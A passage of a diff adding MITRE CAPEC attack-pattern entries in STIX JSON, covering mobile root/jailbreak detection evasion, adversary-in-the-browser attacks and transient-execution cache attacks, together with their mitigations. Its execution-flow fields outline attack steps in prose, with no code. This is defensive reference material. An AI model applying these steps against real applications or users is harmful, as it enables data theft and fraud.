"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--70e9b054-c49a-4250-8674-4d37b0ae027a", + "spec_version": "2.1", + "target_ref": "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary inserts a debugger into the program entry point of a mobile application to modify the application binary, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Rooting/Jailbreaking a mobile device also provides users with access to system debuggers and disassemblers, which can be leveraged to exploit applications by dumping the application's memory at runtime in order to remove or bypass signature verification methods. 
This further allows the adversary to evade Root/Jailbreak detection mechanisms, which can result in execution of administrative commands, obtaining confidential data, impersonating legitimate users of the application, and more.", + "external_references": [ + { + "external_id": "CAPEC-661", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/661.html" + }, + { + "external_id": "CWE-489", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/489.html" + }, + { + "description": "San-Tsai Sun, Andrea Cuadros, Konstantin Beznosov, Android Rooting: Methods, Detection, and Evasion, 2019--06---17, Technische Universität Braunschweig", + "external_id": "REF-625", + "source_name": "reference_from_CAPEC", + "url": "http://lersse-dl.ece.ubc.ca/record/310/files/p3.pdf?subformat=pdfa" + }, + { + "description": "Jose Lopes, Who owns your runtime?, 2015--10---12, Nettitude Labs", + "external_id": "REF-626", + "source_name": "reference_from_CAPEC", + "url": "https://labs.nettitude.com/blog/ios-and-android-runtime-and-anti-debugging-protections/#hooking" + }, + { + "description": "Suresh Khutale, Android Root Detection Bypass by Reverse Engineering APK, 2018--03---06, InfoSec Institute", + "external_id": "REF-627", + "source_name": "reference_from_CAPEC", + "url": "https://resources.infosecinstitute.com/topic/android-root-detection-bypass-reverse-engineering-apk/" + }, + { + "description": "Manuel Egele, Christopher Kruegel, Engin Kirda, Giovanni Vigna, PiOS: Detecting Privacy Leaks in iOS Applications, 2011--02---09", + "external_id": "REF-628", + "source_name": "reference_from_CAPEC", + "url": "https://www.ndss-symposium.org/wp-content/uploads/2017/09/egel.pdf" + } + ], + "id": "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Root/Jailbreak Detection Evasion via Debugging", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3" + ], + "x_capec_child_of_refs": [ + "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Debugging in order to obtain sensitive information.)" + ], + "Authorization": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Debugging, the adversary compromises the integrity of the application.)", + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data (An adversary may leverage Root/Jailbreak Detection Evasion via Debugging in order to obtain sensitive information.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Through Root/Jailbreak Detection Evasion via Debugging, the adversary compromises the integrity of the application.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary targets an iOS banking application in an attempt to compromise sensitive user data. The adversary launches the application with the iOS debugger and sets a breakpoint at the program entry point, after the application's signature has been verified. Next, the adversary dumps the memory region that contains the decrypted code from the address space of the binary. The 'Restrict' flag is then stripped from the application and the adversary resigns the application with a self-signed certificate. The application is now executed without the 'Restrict' flag, while trusting the self-signed certificate to be legitimate. However, the adversary is now able to evaded Jailbreak detection via code hooking or other methods and can glean user credentials and/or transaction details." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify application with attack potential: The adversary searches for and identifies a mobile application that could be exploited for malicious purposes (e.g. banking, voting, or medical applications).

  2. Techniques
    Search application stores for mobile applications worth exploiting

Experiment

  1. Debug the target application: The adversary inserts the debugger into the program entry point of the mobile application, after the application's signature has been identified, to dump its memory contents.

  2. Techniques
    Insert the debugger at the mobile application's program entry point, after the application's signature has been identified.
    Dump the memory region containing the now decrypted code from the address space of the binary.
  3. Remove application signature verification methods: Remove signature verification methods from the decrypted code and resign the application with a self-signed certificate.

Exploit

  1. Execute the application and evade Root/Jailbreak detection methods: The application executes with the self-signed certificate, while believing it contains a trusted certificate. This now allows the adversary to evade Root/Jailbreak detection via code hooking or other methods.

  2. Techniques
    Optional: Hook code into the target application.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "A debugger must be able to be inserted into the targeted application." + ], + "x_capec_resources_required": [ + "The adversary must have a Rooted/Jailbroken mobile device with debugging capabilities." + ], + "x_capec_skills_required": { + "High": "Knowledge about Root/Jailbreak detection and evasion techniques.", + "Medium": "Knowledge about runtime debugging." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Instantiate checks within the application code that ensures debuggers are not attached.", + "id": "course-of-action--218e7e1a-8c49-418c-9bf7-f465a1ee8d93", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-661-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-12-17T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cfe13500-1996-47bc-b16c-88e763f8de3d", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--218e7e1a-8c49-418c-9bf7-f465a1ee8d93", + "spec_version": "2.1", + "target_ref": "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits security vulnerabilities or inherent functionalities of a web browser, in order to manipulate traffic between two endpoints.\n ", + "external_references": [ + { + "external_id": 
"CAPEC-662", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/662.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Man in the Browser", + "external_id": "T1185", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1185" + }, + { + "description": "Man-in-the-browser attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Man-in-the-browser_attack" + }, + { + "description": "Man-in-the-browser attack, Open Web Application Security Project (OWASP)", + "external_id": "REF-629", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/attacks/Man-in-the-browser_attack" + }, + { + "description": "Liviu Arsene, Oil and Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal, 2020--04---21, Bitdefender Labs", + "external_id": "REF-630", + "source_name": "reference_from_CAPEC", + "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/" + }, + { + "description": "Amit Klein, Man-in-the-Mobile Attacks Single Out Android, 2012--07---10, SecurityIntelligence", + "external_id": "REF-631", + "source_name": "reference_from_CAPEC", + "url": "https://securityintelligence.com/man-in-the-mobile-attacks-single-out-android/" + }, + { + "description": "Kelly Jackson Higgins, New 'Boy In The Browser' Attacks On The Rise, 2011--02---14, Dark Reading, Informa PLC", + "external_id": "REF-632", + "source_name": "reference_from_CAPEC", + "url": "https://www.darkreading.com/risk/new-boy-in-the-browser-attacks-on-the-rise/d/d-id/1135247" + } + ], + "id": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "modified": "2022-09-29T00:00:00.000Z", + 
"name": "Adversary in the Browser (AiTB)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Man in the Browser", + "Boy in the Browser", + "Man in the Mobile" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a", + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary conducts a phishing attack and tricks a victim into installing a malicious browser plugin. The adversary then positions themself between the victim and their banking institution. The victim begins by initiating a funds transfer from their personal savings to their personal checking account. Using injected JavaScript, the adversary captures this request and modifies it to transfer an increased amount of funds to an account that they controls, before sending it to the bank. The bank processes the transfer and sends the confirmation notice back to the victim, which is instead intercepted by the adversary. The adversary modifies the confirmation to reflect the original transaction details and sends this modified message back to the victim. Upon receiving the confirmation, the victim assumes the transfer was successful and is unaware that their money has just been transferred to the adversary.\n ", + "\n In 2020, the Agent Tesla malware was leveraged to conduct AiTB attacks against organizations within the gas, oil, and other energy sectors. 
The malware was delivered via a spearphishing campaign and has the capability to form-grab, keylog, copy clipboard data, extract credentials, and capture screenshots. [REF-630]\n ", + "\n Boy in the browser attacks are a subset of AiTB attacks. Similar to AiTB attacks, the adversary must first trick the victim into installing a Trojan, either via social engineering or drive-by-download attacks. The malware then modifies the victim's \"hosts\" file in order to reroute web traffic from an intended website to an adversary-controlled website that mimics the legitimate website. The adversary is now able to observe, intercept, and/or modify all traffic, as in a traditional Adversary in the Middle attack (CAPEC-94). BiTB attacks are low-cost, easy to execute, and more difficult to detect since the malware often removes itself once the attack has concluded. [REF-631]\n ", + "\n Man in the Mobile attacks are a subset of AiTB attacks that target mobile device users. Like AiTB attacks, an adversary convinces a victim to install a Trojan mobile application on their mobile device, often under the guise of security. Once the victim has installed the application, the adversary can capture all SMS traffic to bypass SMS-based out-of-band authentication systems. [REF-632]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. The adversary tricks the victim into installing the Trojan Horse malware onto their system.

  2. Techniques
    Conduct phishing attacks, drive-by malware installations, or masquerade malicious browser extensions as being legitimate.
  3. The adversary inserts themself into the communication channel initially acting as a routing proxy between the two targeted components.

Exploit

  1. The adversary observes, filters, or alters passed data of their choosing to gain access to sensitive information or to manipulate the actions of the two target components for their own purposes.

", + "x_capec_extended_description": "\n This attack first requires the adversary to trick the victim into installing a Trojan Horse application on their system, such as a malicious web browser plugin, which the adversary then leverages to mount the attack. The victim interacts with a web application, such as a banking website, in a normal manner and under the assumption that the connection is secure. However, the adversary can now alter and/or reroute traffic between the client application (e.g., web browser) and the coinciding endpoint, while simultaneously displaying intended transactions and data back to the user. The adversary may also be able to glean cookies, HTTP sessions, and SSL client certificates, which can be used to pivot into an authenticated intranet. Identifying AITB is often difficult because these attacks are successful even when security mechanisms such as SSL/PKI and multifactor authentication are present, since they still function as intended during the attack.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must install or convince a user to install a Trojan.", + "There are two components communicating with each other.", + "An attacker is able to identify the nature and mechanism of communication between the two target components.", + "Strong mutual authentication is not used between the two target components yielding opportunity for adversarial interposition.", + "For browser pivoting, the SeDebugPrivilege and a high-integrity process must both exist to execute this attack." + ], + "x_capec_skills_required": { + "Medium": "Tricking the victim into installing the Trojan is often the most difficult aspect of this attack. Afterwards, the remainder of this attack is fairly trivial." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure software and applications are only downloaded from legitimate and reputable sources, in addition to conducting integrity checks on the downloaded component.", + "id": "course-of-action--859f45e5-d798-477e-a3e4-381e7e492621", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--17c99f05-562d-4662-b800-5617b6dc75c6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--859f45e5-d798-477e-a3e4-381e7e492621", + "spec_version": "2.1", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage anti-malware tools, which can detect Trojan Horse malware.", + "id": "course-of-action--4f258dff-bfd4-4ad4-adcf-d01b6127a826", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a77f1a6-7693-45ea-96fd-c6e1510943e8", + 
"modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f258dff-bfd4-4ad4-adcf-d01b6127a826", + "spec_version": "2.1", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use strong, out-of-band mutual authentication to always fully authenticate both ends of any communications channel.", + "id": "course-of-action--2253f0de-f33b-47c7-9d12-daf69e74fca2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7656220c-0e2c-4110-8dbf-66fc149793c2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2253f0de-f33b-47c7-9d12-daf69e74fca2", + "spec_version": "2.1", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit user permissions to prevent browser pivoting.", + "id": "course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": 
"course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09188a1e-a0b1-4dd9-bd8f-743e97847140", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9", + "spec_version": "2.1", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure browser sessions are regularly terminated and when their effective lifetime ends.", + "id": "course-of-action--8735f337-fdd4-460a-a86f-cbd9b0069176", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-662-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--67a5c853-3f88-42c9-836f-4737587b3cb1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8735f337-fdd4-460a-a86f-cbd9b0069176", + "spec_version": "2.1", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution to expose sensitive 
data and bypass/subvert access control over restricted resources. Typically, the adversary conducts a covert channel attack to target non-discarded microarchitectural changes caused by transient executions such as speculative execution, branch prediction, instruction pipelining, and/or out-of-order execution. The transient execution results in a series of instructions (gadgets) which construct covert channel and access/transfer the secret data.", + "external_references": [ + { + "external_id": "CAPEC-663", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/663.html" + }, + { + "external_id": "CWE-1037", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1037.html" + }, + { + "external_id": "CWE-1303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1303.html" + }, + { + "external_id": "CWE-1264", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1264.html" + }, + { + "description": "Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, Yuval Yarom, Spectre Attacks: Exploiting Speculative Execution, 2019, Graz University of Technology", + "external_id": "REF-637", + "source_name": "reference_from_CAPEC", + "url": "https://spectreattack.com/spectre.pdf" + }, + { + "description": "Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom, Mike Hamburg, Meltdown: Reading Kernel Memory from User Space, 2018, Graz University of Technology", + "external_id": "REF-638", + "source_name": "reference_from_CAPEC", + "url": "https://meltdownattack.com/meltdown.pdf" + }, + { + "description": "Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, Daniel Gruss, A Systematic Evaluation of Transient Execution Attacks and 
Defenses, 2019--05---15, Graz University of Technology", + "external_id": "REF-639", + "source_name": "reference_from_CAPEC", + "url": "https://arxiv.org/abs/1811.05441" + }, + { + "description": "Qian Ge, Yuval Yarom, Gernot Heiser, A Survey of Microarchitectural Timing Attacks and Countermeasures on Contemporary Hardware, 2016--12---26, Journal of Cryptographic Engineering", + "external_id": "REF-640", + "source_name": "reference_from_CAPEC", + "url": "https://eprint.iacr.org/2016/613.pdf" + }, + { + "description": "Nael Abu-Ghazaleh, Dmitry Ponomarev, Dmitry Evtyushkin, How the Spectre and Meltdown Hacks Really Worked, 2019--02---28, IEEE Spectrum", + "external_id": "REF-641", + "source_name": "reference_from_CAPEC", + "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked" + }, + { + "description": "James Sanders, Spectre and Meltdown explained: A comprehensive guide for professionals, 2019--05---15, TechRepublic", + "external_id": "REF-642", + "source_name": "reference_from_CAPEC", + "url": "https://spectrum.ieee.org/computing/hardware/how-the-spectre-and-meltdown-hacks-really-worked" + }, + { + "description": "Alert (TA18-004A) Meltdown and Spectre Side-Channel Vulnerability Guidance, 2018--01---04, CISA", + "external_id": "REF-643", + "source_name": "reference_from_CAPEC", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-004A" + } + ], + "id": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Exploitation of Transient Instruction Execution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb" + ], + "x_capec_child_of_refs": [ + "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + 
"attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_example_instances": [ + "\n A web browser with user-privileges executes JavaScript code imbedded within a malicious website. The system does not disable shared buffers for the web browser and there is no restriction or check upon user-process execution of flush or evict instructions. The Javascript code executes vulnerable transient instructions upon system to cause microarchitectural changes that establish covert channel and transfer sensitive/secret data into shared cache from address space of either kernel, web browser or another executing process on the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application and relevant OS shared code libraries: Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack.

  2. Techniques
    Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system.
  3. Explore cache and identify impacts: Utilize tools to understand the impact of transient instruction execution upon address spaces and CPU operations.

  4. Techniques
    Run OS or application specific tools that examine the contents of cache.

Experiment

  1. Cause conditions for identified transient instruction set execution: Adversary ensures that specific code/instructions of the target process are executed by CPU, so desired transient instructions are executed.

  2. Cause specific secret data to be cached from restricted address space: Executed instruction sets (gadgets) in target address space, initially executed via adversary-chosen transient instructions sets, establish covert channel and transfer secret data across this channel to cache.

  3. Techniques
    Prediction-based - adversary trains CPU to incorrectly predict/speculate conditions for instruction execution to be true, hence executing adversary-chosen transient instructions. These prediction-based methods include: Pattern History Table (PHT)/Input Validation Bypass, Branch Target Buffer (BTB)/Branch Target Injection, Return Stack Buffer (RSB)/Return Address Injection, and Store To Load (STL)/Speculative Store Bypass.
    Exception/Fault-based - adversary has CPU execute transient instructions that raise an exception allowing inaccessible memory space to be accessed via out-of-order execution. These exception/fault-based methods include: Supervisor-only Bypass, Virtual Translation Bypass, System Register Bypass, FPU Register Bypass, Read-only Bypass, Protection Key Bypass, and Bounds Check Bypass.

Exploit

  1. Perform covert channel attack to obtain/access secret data: Adversary process code removes instructions/data from shared cache set, waits for target process to reinsert them back into cache, to identify location of secret data via a timing method. Adversary continuously repeat this process to identify and access entirety of targeted secret data.

  2. Techniques
    Flush+Reload - adversary frequently flushes targeted memory cache line using a dedicated machine flush instruction, and uses another process to measure time taken for CPU to load victim secret data.
    Evict+Time - adversary causes victim to load target set into cache and measures time for victim process to load this data, setting a baseline. Adversary evicts a specified cache line and causes victim process to execute again, and measures any change in execution time, to determine if cache line was accessed.
    Prime+Probe - adversary primes cache by filling cache line(s) or set(s) with data, after some time victim process evicts this adversary data to replace it with secret data. The adversary then probes/accesses all the previously accessed cache lines detecting cache misses, which determine that their attacker data has been evicted and replaced with secret data from victim process.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--faa02de4-0f9b-4881-a088-b2a4d64475fd" + ], + "x_capec_peer_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "attack-pattern--d5e0c12f-6086-491d-86e5-e10a14d1f947", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_prerequisites": [ + "The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU." + ], + "x_capec_resources_required": [ + "C2C mechanism or direct access to victim system, capable of dropping malicious program and collecting covert channel attack data.", + "Malicious program capable of triggering execution of transient instructions or vulnerable instruction sequences of victim program and performing a covert channel attack to gather data from victim process memory space. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources of the victim machine." + ], + "x_capec_skills_required": { + "High": "Detailed knowledge on compiled binaries and operating system shared libraries of instruction sequences, and layout of application and OS/Kernel address spaces for data leakage." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: DAWG (Dynamically Allocated Way Guard) - processor cache properly divided between different programs/processes that don't share resources", + "id": "course-of-action--b9126a5e-0a53-42a6-9605-92e09bea13d2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8ff9f578-79d5-4352-a475-1b33b37b07a7", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b9126a5e-0a53-42a6-9605-92e09bea13d2", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: KPTI (Kernel Page-Table Isolation) to completely separate user-space and kernel space page tables", + "id": "course-of-action--58b2d339-c160-4d96-b0fa-3e4dba290713", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--fbff3867-2c77-46ca-911a-4348a280a4bb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58b2d339-c160-4d96-b0fa-3e4dba290713", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Architectural Design of Microcode to limit abuse of speculative execution and out-of-order execution", + "id": "course-of-action--3f5fcaf8-e704-4973-b9d1-748021eb261f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-663-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e424f3f2-c61b-4d4a-9e40-eef4438e644d", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3f5fcaf8-e704-4973-b9d1-748021eb261f", + "spec_version": "2.1", + "target_ref": 